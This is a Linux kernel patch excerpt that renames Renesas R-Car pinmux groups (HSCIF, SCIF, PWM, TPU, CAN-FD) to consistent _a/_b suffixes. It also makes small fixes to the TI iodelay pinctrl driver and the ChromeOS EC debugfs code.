+@@ -1575,49 +1574,48 @@ static const unsigned int hscif0_ctrl_mux[] = {
+ };
+ 
+ /* - HSCIF1 ----------------------------------------------------------------- */
+-static const unsigned int hscif1_data_pins[] = {
+-	/* HRX1, HTX1 */
++static const unsigned int hscif1_data_a_pins[] = {
++	/* HRX1_A, HTX1_A */
+ 	RCAR_GP_PIN(0, 15), RCAR_GP_PIN(0, 14),
+ };
+-static const unsigned int hscif1_data_mux[] = {
+-	HRX1_MARK, HTX1_MARK,
++static const unsigned int hscif1_data_a_mux[] = {
++	HRX1_A_MARK, HTX1_A_MARK,
+ };
+-static const unsigned int hscif1_clk_pins[] = {
+-	/* HSCK1 */
++static const unsigned int hscif1_clk_a_pins[] = {
++	/* HSCK1_A */
+ 	RCAR_GP_PIN(0, 18),
+ };
+-static const unsigned int hscif1_clk_mux[] = {
+-	HSCK1_MARK,
++static const unsigned int hscif1_clk_a_mux[] = {
++	HSCK1_A_MARK,
+ };
+-static const unsigned int hscif1_ctrl_pins[] = {
+-	/* HRTS1_N, HCTS1_N */
++static const unsigned int hscif1_ctrl_a_pins[] = {
++	/* HRTS1_N_A, HCTS1_N_A */
+ 	RCAR_GP_PIN(0, 17), RCAR_GP_PIN(0, 16),
+ };
+-static const unsigned int hscif1_ctrl_mux[] = {
+-	HRTS1_N_MARK, HCTS1_N_MARK,
++static const unsigned int hscif1_ctrl_a_mux[] = {
++	HRTS1_N_A_MARK, HCTS1_N_A_MARK,
+ };
+ 
+-/* - HSCIF1_X---------------------------------------------------------------- */
+-static const unsigned int hscif1_data_x_pins[] = {
+-	/* HRX1_X, HTX1_X */
++static const unsigned int hscif1_data_b_pins[] = {
++	/* HRX1_B, HTX1_B */
+ 	RCAR_GP_PIN(1, 7), RCAR_GP_PIN(1, 6),
+ };
+-static const unsigned int hscif1_data_x_mux[] = {
+-	HRX1_X_MARK, HTX1_X_MARK,
++static const unsigned int hscif1_data_b_mux[] = {
++	HRX1_B_MARK, HTX1_B_MARK,
+ };
+-static const unsigned int hscif1_clk_x_pins[] = {
+-	/* HSCK1_X */
++static const unsigned int hscif1_clk_b_pins[] = {
++	/* HSCK1_B */
+ 	RCAR_GP_PIN(1, 10),
+ };
+-static const unsigned int hscif1_clk_x_mux[] = {
+-	HSCK1_X_MARK,
++static const unsigned int hscif1_clk_b_mux[] = {
++	HSCK1_B_MARK,
+ };
+-static const unsigned int hscif1_ctrl_x_pins[] = {
+-	/* HRTS1_N_X, HCTS1_N_X */
++static const unsigned int hscif1_ctrl_b_pins[] = {
++	/* HRTS1_N_B, HCTS1_N_B */
+ 	RCAR_GP_PIN(1, 9), RCAR_GP_PIN(1, 8),
+ };
+-static const unsigned int hscif1_ctrl_x_mux[] = {
+-	HRTS1_N_X_MARK, HCTS1_N_X_MARK,
++static const unsigned int hscif1_ctrl_b_mux[] = {
++	HRTS1_N_B_MARK, HCTS1_N_B_MARK,
+ };
+ 
+ /* - HSCIF2 ----------------------------------------------------------------- */
+@@ -1644,49 +1642,48 @@ static const unsigned int hscif2_ctrl_mux[] = {
+ };
+ 
+ /* - HSCIF3 ----------------------------------------------------------------- */
+-static const unsigned int hscif3_data_pins[] = {
+-	/* HRX3, HTX3 */
++static const unsigned int hscif3_data_a_pins[] = {
++	/* HRX3_A, HTX3_A */
+ 	RCAR_GP_PIN(1, 24), RCAR_GP_PIN(1, 28),
+ };
+-static const unsigned int hscif3_data_mux[] = {
+-	HRX3_MARK, HTX3_MARK,
++static const unsigned int hscif3_data_a_mux[] = {
++	HRX3_A_MARK, HTX3_A_MARK,
+ };
+-static const unsigned int hscif3_clk_pins[] = {
+-	/* HSCK3 */
++static const unsigned int hscif3_clk_a_pins[] = {
++	/* HSCK3_A */
+ 	RCAR_GP_PIN(1, 25),
+ };
+-static const unsigned int hscif3_clk_mux[] = {
+-	HSCK3_MARK,
++static const unsigned int hscif3_clk_a_mux[] = {
++	HSCK3_A_MARK,
+ };
+-static const unsigned int hscif3_ctrl_pins[] = {
+-	/* HRTS3_N, HCTS3_N */
++static const unsigned int hscif3_ctrl_a_pins[] = {
++	/* HRTS3_N_A, HCTS3_N_A */
+ 	RCAR_GP_PIN(1, 26), RCAR_GP_PIN(1, 27),
+ };
+-static const unsigned int hscif3_ctrl_mux[] = {
+-	HRTS3_N_MARK, HCTS3_N_MARK,
++static const unsigned int hscif3_ctrl_a_mux[] = {
++	HRTS3_N_A_MARK, HCTS3_N_A_MARK,
+ };
+ 
+-/* - HSCIF3_A ----------------------------------------------------------------- */
+-static const unsigned int hscif3_data_a_pins[] = {
+-	/* HRX3_A, HTX3_A */
++static const unsigned int hscif3_data_b_pins[] = {
++	/* HRX3_B, HTX3_B */
+ 	RCAR_GP_PIN(1, 4), RCAR_GP_PIN(1, 0),
+ };
+-static const unsigned int hscif3_data_a_mux[] = {
+-	HRX3_A_MARK, HTX3_A_MARK,
++static const unsigned int hscif3_data_b_mux[] = {
++	HRX3_B_MARK, HTX3_B_MARK,
+ };
+-static const unsigned int hscif3_clk_a_pins[] = {
+-	/* HSCK3_A */
++static const unsigned int hscif3_clk_b_pins[] = {
++	/* HSCK3_B */
+ 	RCAR_GP_PIN(1, 3),
+ };
+-static const unsigned int hscif3_clk_a_mux[] = {
+-	HSCK3_A_MARK,
++static const unsigned int hscif3_clk_b_mux[] = {
++	HSCK3_B_MARK,
+ };
+-static const unsigned int hscif3_ctrl_a_pins[] = {
+-	/* HRTS3_N_A, HCTS3_N_A */
++static const unsigned int hscif3_ctrl_b_pins[] = {
++	/* HRTS3_N_B, HCTS3_N_B */
+ 	RCAR_GP_PIN(1, 2), RCAR_GP_PIN(1, 1),
+ };
+-static const unsigned int hscif3_ctrl_a_mux[] = {
+-	HRTS3_N_A_MARK, HCTS3_N_A_MARK,
++static const unsigned int hscif3_ctrl_b_mux[] = {
++	HRTS3_N_B_MARK, HCTS3_N_B_MARK,
+ };
+ 
+ /* - I2C0 ------------------------------------------------------------------- */
+@@ -2069,13 +2066,13 @@ static const unsigned int pcie1_clkreq_n_mux[] = {
+ 	PCIE1_CLKREQ_N_MARK,
+ };
+ 
+-/* - PWM0_A ------------------------------------------------------------------- */
+-static const unsigned int pwm0_a_pins[] = {
+-	/* PWM0_A */
++/* - PWM0 ------------------------------------------------------------------- */
++static const unsigned int pwm0_pins[] = {
++	/* PWM0 */
+ 	RCAR_GP_PIN(1, 15),
+ };
+-static const unsigned int pwm0_a_mux[] = {
+-	PWM0_A_MARK,
++static const unsigned int pwm0_mux[] = {
++	PWM0_MARK,
+ };
+ 
+ /* - PWM1_A ------------------------------------------------------------------- */
+@@ -2096,13 +2093,13 @@ static const unsigned int pwm1_b_mux[] = {
+ 	PWM1_B_MARK,
+ };
+ 
+-/* - PWM2_B ------------------------------------------------------------------- */
+-static const unsigned int pwm2_b_pins[] = {
+-	/* PWM2_B */
++/* - PWM2 ------------------------------------------------------------------- */
++static const unsigned int pwm2_pins[] = {
++	/* PWM2 */
+ 	RCAR_GP_PIN(2, 14),
+ };
+-static const unsigned int pwm2_b_mux[] = {
+-	PWM2_B_MARK,
++static const unsigned int pwm2_mux[] = {
++	PWM2_MARK,
+ };
+ 
+ /* - PWM3_A ------------------------------------------------------------------- */
+@@ -2159,22 +2156,22 @@ static const unsigned int pwm7_mux[] = {
+ 	PWM7_MARK,
+ };
+ 
+-/* - PWM8_A ------------------------------------------------------------------- */
+-static const unsigned int pwm8_a_pins[] = {
+-	/* PWM8_A */
++/* - PWM8 ------------------------------------------------------------------- */
++static const unsigned int pwm8_pins[] = {
++	/* PWM8 */
+ 	RCAR_GP_PIN(1, 13),
+ };
+-static const unsigned int pwm8_a_mux[] = {
+-	PWM8_A_MARK,
++static const unsigned int pwm8_mux[] = {
++	PWM8_MARK,
+ };
+ 
+-/* - PWM9_A ------------------------------------------------------------------- */
+-static const unsigned int pwm9_a_pins[] = {
+-	/* PWM9_A */
++/* - PWM9 ------------------------------------------------------------------- */
++static const unsigned int pwm9_pins[] = {
++	/* PWM9 */
+ 	RCAR_GP_PIN(1, 14),
+ };
+-static const unsigned int pwm9_a_mux[] = {
+-	PWM9_A_MARK,
++static const unsigned int pwm9_mux[] = {
++	PWM9_MARK,
+ };
+ 
+ /* - QSPI0 ------------------------------------------------------------------ */
+@@ -2237,75 +2234,51 @@ static const unsigned int scif0_ctrl_mux[] = {
+ };
+ 
+ /* - SCIF1 ------------------------------------------------------------------ */
+-static const unsigned int scif1_data_pins[] = {
+-	/* RX1, TX1 */
++static const unsigned int scif1_data_a_pins[] = {
++	/* RX1_A, TX1_A */
+ 	RCAR_GP_PIN(0, 15), RCAR_GP_PIN(0, 14),
+ };
+-static const unsigned int scif1_data_mux[] = {
+-	RX1_MARK, TX1_MARK,
++static const unsigned int scif1_data_a_mux[] = {
++	RX1_A_MARK, TX1_A_MARK,
+ };
+-static const unsigned int scif1_clk_pins[] = {
+-	/* SCK1 */
++static const unsigned int scif1_clk_a_pins[] = {
++	/* SCK1_A */
+ 	RCAR_GP_PIN(0, 18),
+ };
+-static const unsigned int scif1_clk_mux[] = {
+-	SCK1_MARK,
++static const unsigned int scif1_clk_a_mux[] = {
++	SCK1_A_MARK,
+ };
+-static const unsigned int scif1_ctrl_pins[] = {
+-	/* RTS1_N, CTS1_N */
++static const unsigned int scif1_ctrl_a_pins[] = {
++	/* RTS1_N_A, CTS1_N_A */
+ 	RCAR_GP_PIN(0, 17), RCAR_GP_PIN(0, 16),
+ };
+-static const unsigned int scif1_ctrl_mux[] = {
+-	RTS1_N_MARK, CTS1_N_MARK,
++static const unsigned int scif1_ctrl_a_mux[] = {
++	RTS1_N_A_MARK, CTS1_N_A_MARK,
+ };
+ 
+-/* - SCIF1_X ------------------------------------------------------------------ */
+-static const unsigned int scif1_data_x_pins[] = {
+-	/* RX1_X, TX1_X */
++static const unsigned int scif1_data_b_pins[] = {
++	/* RX1_B, TX1_B */
+ 	RCAR_GP_PIN(1, 7), RCAR_GP_PIN(1, 6),
+ };
+-static const unsigned int scif1_data_x_mux[] = {
+-	RX1_X_MARK, TX1_X_MARK,
++static const unsigned int scif1_data_b_mux[] = {
++	RX1_B_MARK, TX1_B_MARK,
+ };
+-static const unsigned int scif1_clk_x_pins[] = {
+-	/* SCK1_X */
++static const unsigned int scif1_clk_b_pins[] = {
++	/* SCK1_B */
+ 	RCAR_GP_PIN(1, 10),
+ };
+-static const unsigned int scif1_clk_x_mux[] = {
+-	SCK1_X_MARK,
++static const unsigned int scif1_clk_b_mux[] = {
++	SCK1_B_MARK,
+ };
+-static const unsigned int scif1_ctrl_x_pins[] = {
+-	/* RTS1_N_X, CTS1_N_X */
++static const unsigned int scif1_ctrl_b_pins[] = {
++	/* RTS1_N_B, CTS1_N_B */
+ 	RCAR_GP_PIN(1, 9), RCAR_GP_PIN(1, 8),
+ };
+-static const unsigned int scif1_ctrl_x_mux[] = {
+-	RTS1_N_X_MARK, CTS1_N_X_MARK,
++static const unsigned int scif1_ctrl_b_mux[] = {
++	RTS1_N_B_MARK, CTS1_N_B_MARK,
+ };
+ 
+ /* - SCIF3 ------------------------------------------------------------------ */
+-static const unsigned int scif3_data_pins[] = {
+-	/* RX3, TX3 */
+-	RCAR_GP_PIN(1, 1), RCAR_GP_PIN(1, 0),
+-};
+-static const unsigned int scif3_data_mux[] = {
+-	RX3_MARK, TX3_MARK,
+-};
+-static const unsigned int scif3_clk_pins[] = {
+-	/* SCK3 */
+-	RCAR_GP_PIN(1, 4),
+-};
+-static const unsigned int scif3_clk_mux[] = {
+-	SCK3_MARK,
+-};
+-static const unsigned int scif3_ctrl_pins[] = {
+-	/* RTS3_N, CTS3_N */
+-	RCAR_GP_PIN(1, 2), RCAR_GP_PIN(1, 3),
+-};
+-static const unsigned int scif3_ctrl_mux[] = {
+-	RTS3_N_MARK, CTS3_N_MARK,
+-};
+-
+-/* - SCIF3_A ------------------------------------------------------------------ */
+ static const unsigned int scif3_data_a_pins[] = {
+ 	/* RX3_A, TX3_A */
+ 	RCAR_GP_PIN(1, 27), RCAR_GP_PIN(1, 28),
+@@ -2328,6 +2301,28 @@ static const unsigned int scif3_ctrl_a_mux[] = {
+ 	RTS3_N_A_MARK, CTS3_N_A_MARK,
+ };
+ 
++static const unsigned int scif3_data_b_pins[] = {
++	/* RX3_B, TX3_B */
++	RCAR_GP_PIN(1, 1), RCAR_GP_PIN(1, 0),
++};
++static const unsigned int scif3_data_b_mux[] = {
++	RX3_B_MARK, TX3_B_MARK,
++};
++static const unsigned int scif3_clk_b_pins[] = {
++	/* SCK3_B */
++	RCAR_GP_PIN(1, 4),
++};
++static const unsigned int scif3_clk_b_mux[] = {
++	SCK3_B_MARK,
++};
++static const unsigned int scif3_ctrl_b_pins[] = {
++	/* RTS3_N_B, CTS3_N_B */
++	RCAR_GP_PIN(1, 2), RCAR_GP_PIN(1, 3),
++};
++static const unsigned int scif3_ctrl_b_mux[] = {
++	RTS3_N_B_MARK, CTS3_N_B_MARK,
++};
++
+ /* - SCIF4 ------------------------------------------------------------------ */
+ static const unsigned int scif4_data_pins[] = {
+ 	/* RX4, TX4 */
+@@ -2384,64 +2379,63 @@ static const unsigned int ssi_ctrl_mux[] = {
+ 	SSI_SCK_MARK, SSI_WS_MARK,
+ };
+ 
+-/* - TPU ------------------------------------------------------------------- */
+-static const unsigned int tpu_to0_pins[] = {
+-	/* TPU0TO0 */
++/* - TPU -------------------------------------------------------------------- */
++static const unsigned int tpu_to0_a_pins[] = {
++	/* TPU0TO0_A */
+ 	RCAR_GP_PIN(2, 8),
+ };
+-static const unsigned int tpu_to0_mux[] = {
+-	TPU0TO0_MARK,
++static const unsigned int tpu_to0_a_mux[] = {
++	TPU0TO0_A_MARK,
+ };
+-static const unsigned int tpu_to1_pins[] = {
+-	/* TPU0TO1 */
++static const unsigned int tpu_to1_a_pins[] = {
++	/* TPU0TO1_A */
+ 	RCAR_GP_PIN(2, 7),
+ };
+-static const unsigned int tpu_to1_mux[] = {
+-	TPU0TO1_MARK,
++static const unsigned int tpu_to1_a_mux[] = {
++	TPU0TO1_A_MARK,
+ };
+-static const unsigned int tpu_to2_pins[] = {
+-	/* TPU0TO2 */
++static const unsigned int tpu_to2_a_pins[] = {
++	/* TPU0TO2_A */
+ 	RCAR_GP_PIN(2, 12),
+ };
+-static const unsigned int tpu_to2_mux[] = {
+-	TPU0TO2_MARK,
++static const unsigned int tpu_to2_a_mux[] = {
++	TPU0TO2_A_MARK,
+ };
+-static const unsigned int tpu_to3_pins[] = {
+-	/* TPU0TO3 */
++static const unsigned int tpu_to3_a_pins[] = {
++	/* TPU0TO3_A */
+ 	RCAR_GP_PIN(2, 13),
+ };
+-static const unsigned int tpu_to3_mux[] = {
+-	TPU0TO3_MARK,
++static const unsigned int tpu_to3_a_mux[] = {
++	TPU0TO3_A_MARK,
+ };
+ 
+-/* - TPU_A ------------------------------------------------------------------- */
+-static const unsigned int tpu_to0_a_pins[] = {
+-	/* TPU0TO0_A */
++static const unsigned int tpu_to0_b_pins[] = {
++	/* TPU0TO0_B */
+ 	RCAR_GP_PIN(1, 25),
+ };
+-static const unsigned int tpu_to0_a_mux[] = {
+-	TPU0TO0_A_MARK,
++static const unsigned int tpu_to0_b_mux[] = {
++	TPU0TO0_B_MARK,
+ };
+-static const unsigned int tpu_to1_a_pins[] = {
+-	/* TPU0TO1_A */
++static const unsigned int tpu_to1_b_pins[] = {
++	/* TPU0TO1_B */
+ 	RCAR_GP_PIN(1, 26),
+ };
+-static const unsigned int tpu_to1_a_mux[] = {
+-	TPU0TO1_A_MARK,
++static const unsigned int tpu_to1_b_mux[] = {
++	TPU0TO1_B_MARK,
+ };
+-static const unsigned int tpu_to2_a_pins[] = {
+-	/* TPU0TO2_A */
++static const unsigned int tpu_to2_b_pins[] = {
++	/* TPU0TO2_B */
+ 	RCAR_GP_PIN(2, 0),
+ };
+-static const unsigned int tpu_to2_a_mux[] = {
+-	TPU0TO2_A_MARK,
++static const unsigned int tpu_to2_b_mux[] = {
++	TPU0TO2_B_MARK,
+ };
+-static const unsigned int tpu_to3_a_pins[] = {
+-	/* TPU0TO3_A */
++static const unsigned int tpu_to3_b_pins[] = {
++	/* TPU0TO3_B */
+ 	RCAR_GP_PIN(2, 1),
+ };
+-static const unsigned int tpu_to3_a_mux[] = {
+-	TPU0TO3_A_MARK,
++static const unsigned int tpu_to3_b_mux[] = {
++	TPU0TO3_B_MARK,
+ };
+ 
+ /* - TSN0 ------------------------------------------------ */
+@@ -2551,8 +2545,8 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(canfd2_data),
+ 	SH_PFC_PIN_GROUP(canfd3_data),
+ 	SH_PFC_PIN_GROUP(canfd4_data),
+-	SH_PFC_PIN_GROUP(canfd5_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(canfd5_data_b),	/* suffix might be updated */
++	SH_PFC_PIN_GROUP(canfd5_data_a),
++	SH_PFC_PIN_GROUP(canfd5_data_b),
+ 	SH_PFC_PIN_GROUP(canfd6_data),
+ 	SH_PFC_PIN_GROUP(canfd7_data),
+ 	SH_PFC_PIN_GROUP(can_clk),
+@@ -2560,21 +2554,21 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(hscif0_data),
+ 	SH_PFC_PIN_GROUP(hscif0_clk),
+ 	SH_PFC_PIN_GROUP(hscif0_ctrl),
+-	SH_PFC_PIN_GROUP(hscif1_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_data_x),	/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_clk_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif1_ctrl_x),	/* suffix might be updated */
++	SH_PFC_PIN_GROUP(hscif1_data_a),
++	SH_PFC_PIN_GROUP(hscif1_clk_a),
++	SH_PFC_PIN_GROUP(hscif1_ctrl_a),
++	SH_PFC_PIN_GROUP(hscif1_data_b),
++	SH_PFC_PIN_GROUP(hscif1_clk_b),
++	SH_PFC_PIN_GROUP(hscif1_ctrl_b),
+ 	SH_PFC_PIN_GROUP(hscif2_data),
+ 	SH_PFC_PIN_GROUP(hscif2_clk),
+ 	SH_PFC_PIN_GROUP(hscif2_ctrl),
+-	SH_PFC_PIN_GROUP(hscif3_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_data_a),	/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_clk_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(hscif3_ctrl_a),	/* suffix might be updated */
++	SH_PFC_PIN_GROUP(hscif3_data_a),
++	SH_PFC_PIN_GROUP(hscif3_clk_a),
++	SH_PFC_PIN_GROUP(hscif3_ctrl_a),
++	SH_PFC_PIN_GROUP(hscif3_data_b),
++	SH_PFC_PIN_GROUP(hscif3_clk_b),
++	SH_PFC_PIN_GROUP(hscif3_ctrl_b),
+ 
+ 	SH_PFC_PIN_GROUP(i2c0),
+ 	SH_PFC_PIN_GROUP(i2c1),
+@@ -2636,18 +2630,18 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(pcie0_clkreq_n),
+ 	SH_PFC_PIN_GROUP(pcie1_clkreq_n),
+ 
+-	SH_PFC_PIN_GROUP(pwm0_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(pwm0),
+ 	SH_PFC_PIN_GROUP(pwm1_a),
+ 	SH_PFC_PIN_GROUP(pwm1_b),
+-	SH_PFC_PIN_GROUP(pwm2_b),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(pwm2),
+ 	SH_PFC_PIN_GROUP(pwm3_a),
+ 	SH_PFC_PIN_GROUP(pwm3_b),
+ 	SH_PFC_PIN_GROUP(pwm4),
+ 	SH_PFC_PIN_GROUP(pwm5),
+ 	SH_PFC_PIN_GROUP(pwm6),
+ 	SH_PFC_PIN_GROUP(pwm7),
+-	SH_PFC_PIN_GROUP(pwm8_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(pwm9_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(pwm8),
++	SH_PFC_PIN_GROUP(pwm9),
+ 
+ 	SH_PFC_PIN_GROUP(qspi0_ctrl),
+ 	BUS_DATA_PIN_GROUP(qspi0_data, 2),
+@@ -2659,18 +2653,18 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(scif0_data),
+ 	SH_PFC_PIN_GROUP(scif0_clk),
+ 	SH_PFC_PIN_GROUP(scif0_ctrl),
+-	SH_PFC_PIN_GROUP(scif1_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_data_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_clk_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif1_ctrl_x),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_data),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_clk),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_ctrl),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_data_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_clk_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(scif3_ctrl_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(scif1_data_a),
++	SH_PFC_PIN_GROUP(scif1_clk_a),
++	SH_PFC_PIN_GROUP(scif1_ctrl_a),
++	SH_PFC_PIN_GROUP(scif1_data_b),
++	SH_PFC_PIN_GROUP(scif1_clk_b),
++	SH_PFC_PIN_GROUP(scif1_ctrl_b),
++	SH_PFC_PIN_GROUP(scif3_data_a),
++	SH_PFC_PIN_GROUP(scif3_clk_a),
++	SH_PFC_PIN_GROUP(scif3_ctrl_a),
++	SH_PFC_PIN_GROUP(scif3_data_b),
++	SH_PFC_PIN_GROUP(scif3_clk_b),
++	SH_PFC_PIN_GROUP(scif3_ctrl_b),
+ 	SH_PFC_PIN_GROUP(scif4_data),
+ 	SH_PFC_PIN_GROUP(scif4_clk),
+ 	SH_PFC_PIN_GROUP(scif4_ctrl),
+@@ -2680,14 +2674,14 @@ static const struct sh_pfc_pin_group pinmux_groups[] = {
+ 	SH_PFC_PIN_GROUP(ssi_data),
+ 	SH_PFC_PIN_GROUP(ssi_ctrl),
+ 
+-	SH_PFC_PIN_GROUP(tpu_to0),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to0_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to1),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to1_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to2),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to2_a),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to3),		/* suffix might be updated */
+-	SH_PFC_PIN_GROUP(tpu_to3_a),		/* suffix might be updated */
++	SH_PFC_PIN_GROUP(tpu_to0_a),
++	SH_PFC_PIN_GROUP(tpu_to0_b),
++	SH_PFC_PIN_GROUP(tpu_to1_a),
++	SH_PFC_PIN_GROUP(tpu_to1_b),
++	SH_PFC_PIN_GROUP(tpu_to2_a),
++	SH_PFC_PIN_GROUP(tpu_to2_b),
++	SH_PFC_PIN_GROUP(tpu_to3_a),
++	SH_PFC_PIN_GROUP(tpu_to3_b),
+ 
+ 	SH_PFC_PIN_GROUP(tsn0_link),
+ 	SH_PFC_PIN_GROUP(tsn0_phy_int),
+@@ -2756,8 +2750,7 @@ static const char * const canfd4_groups[] = {
+ };
+ 
+ static const char * const canfd5_groups[] = {
+-	/* suffix might be updated */
+-	"canfd5_data",
++	"canfd5_data_a",
+ 	"canfd5_data_b",
+ };
+ 
+@@ -2780,13 +2773,12 @@ static const char * const hscif0_groups[] = {
+ };
+ 
+ static const char * const hscif1_groups[] = {
+-	/* suffix might be updated */
+-	"hscif1_data",
+-	"hscif1_clk",
+-	"hscif1_ctrl",
+-	"hscif1_data_x",
+-	"hscif1_clk_x",
+-	"hscif1_ctrl_x",
++	"hscif1_data_a",
++	"hscif1_clk_a",
++	"hscif1_ctrl_a",
++	"hscif1_data_b",
++	"hscif1_clk_b",
++	"hscif1_ctrl_b",
+ };
+ 
+ static const char * const hscif2_groups[] = {
+@@ -2796,13 +2788,12 @@ static const char * const hscif2_groups[] = {
+ };
+ 
+ static const char * const hscif3_groups[] = {
+-	/* suffix might be updated */
+-	"hscif3_data",
+-	"hscif3_clk",
+-	"hscif3_ctrl",
+ 	"hscif3_data_a",
+ 	"hscif3_clk_a",
+ 	"hscif3_ctrl_a",
++	"hscif3_data_b",
++	"hscif3_clk_b",
++	"hscif3_ctrl_b",
+ };
+ 
+ static const char * const i2c0_groups[] = {
+@@ -2899,8 +2890,7 @@ static const char * const pcie_groups[] = {
+ };
+ 
+ static const char * const pwm0_groups[] = {
+-	/* suffix might be updated */
+-	"pwm0_a",
++	"pwm0",
+ };
+ 
+ static const char * const pwm1_groups[] = {
+@@ -2909,8 +2899,7 @@ static const char * const pwm1_groups[] = {
+ };
+ 
+ static const char * const pwm2_groups[] = {
+-	/* suffix might be updated */
+-	"pwm2_b",
++	"pwm2",
+ };
+ 
+ static const char * const pwm3_groups[] = {
+@@ -2935,13 +2924,11 @@ static const char * const pwm7_groups[] = {
+ };
+ 
+ static const char * const pwm8_groups[] = {
+-	/* suffix might be updated */
+-	"pwm8_a",
++	"pwm8",
+ };
+ 
+ static const char * const pwm9_groups[] = {
+-	/* suffix might be updated */
+-	"pwm9_a",
++	"pwm9",
+ };
+ 
+ static const char * const qspi0_groups[] = {
+@@ -2963,23 +2950,21 @@ static const char * const scif0_groups[] = {
+ };
+ 
+ static const char * const scif1_groups[] = {
+-	/* suffix might be updated */
+-	"scif1_data",
+-	"scif1_clk",
+-	"scif1_ctrl",
+-	"scif1_data_x",
+-	"scif1_clk_x",
+-	"scif1_ctrl_x",
++	"scif1_data_a",
++	"scif1_clk_a",
++	"scif1_ctrl_a",
++	"scif1_data_b",
++	"scif1_clk_b",
++	"scif1_ctrl_b",
+ };
+ 
+ static const char * const scif3_groups[] = {
+-	/* suffix might be updated */
+-	"scif3_data",
+-	"scif3_clk",
+-	"scif3_ctrl",
+ 	"scif3_data_a",
+ 	"scif3_clk_a",
+ 	"scif3_ctrl_a",
++	"scif3_data_b",
++	"scif3_clk_b",
++	"scif3_ctrl_b",
+ };
+ 
+ static const char * const scif4_groups[] = {
+@@ -3002,15 +2987,14 @@ static const char * const ssi_groups[] = {
+ };
+ 
+ static const char * const tpu_groups[] = {
+-	/* suffix might be updated */
+-	"tpu_to0",
+ 	"tpu_to0_a",
+-	"tpu_to1",
++	"tpu_to0_b",
+ 	"tpu_to1_a",
+-	"tpu_to2",
++	"tpu_to1_b",
+ 	"tpu_to2_a",
+-	"tpu_to3",
++	"tpu_to2_b",
+ 	"tpu_to3_a",
++	"tpu_to3_b",
+ };
+ 
+ static const char * const tsn0_groups[] = {
+diff --git a/drivers/pinctrl/ti/pinctrl-ti-iodelay.c b/drivers/pinctrl/ti/pinctrl-ti-iodelay.c
+index 4e2382778d38f..f3411e3eaf2ea 100644
+--- a/drivers/pinctrl/ti/pinctrl-ti-iodelay.c
++++ b/drivers/pinctrl/ti/pinctrl-ti-iodelay.c
+@@ -883,7 +883,7 @@ static int ti_iodelay_probe(struct platform_device *pdev)
+ 	iod->desc.name = dev_name(dev);
+ 	iod->desc.owner = THIS_MODULE;
+ 
+-	ret = pinctrl_register_and_init(&iod->desc, dev, iod, &iod->pctl);
++	ret = devm_pinctrl_register_and_init(dev, &iod->desc, iod, &iod->pctl);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register pinctrl\n");
+ 		goto exit_out;
+@@ -891,7 +891,11 @@ static int ti_iodelay_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, iod);
+ 
+-	return pinctrl_enable(iod->pctl);
++	ret = pinctrl_enable(iod->pctl);
++	if (ret)
++		goto exit_out;
++
++	return 0;
+ 
+ exit_out:
+ 	of_node_put(np);
+@@ -908,12 +912,6 @@ static int ti_iodelay_remove(struct platform_device *pdev)
+ {
+ 	struct ti_iodelay_device *iod = platform_get_drvdata(pdev);
+ 
+-	if (!iod)
+-		return 0;
+-
+-	if (iod->pctl)
+-		pinctrl_unregister(iod->pctl);
+-
+ 	ti_iodelay_pinconf_deinit_dev(iod);
+ 
+ 	/* Expect other allocations to be freed by devm */
+diff --git a/drivers/platform/chrome/cros_ec_debugfs.c b/drivers/platform/chrome/cros_ec_debugfs.c
+index 4e63adf083ea1..b19207f3aecfe 100644
+--- a/drivers/platform/chrome/cros_ec_debugfs.c
++++ b/drivers/platform/chrome/cros_ec_debugfs.c
+@@ -326,6 +326,7 @@ static int ec_read_version_supported(struct cros_ec_dev *ec)
+ 	if (!msg)
+ 		return 0;
+ 
++	msg->version = 1;
+ 	msg->command = EC_CMD_GET_CMD_VERSIONS + ec->cmd_offset;
+ 	msg->outsize = sizeof(*params);
+ 	msg->insize = sizeof(*response);
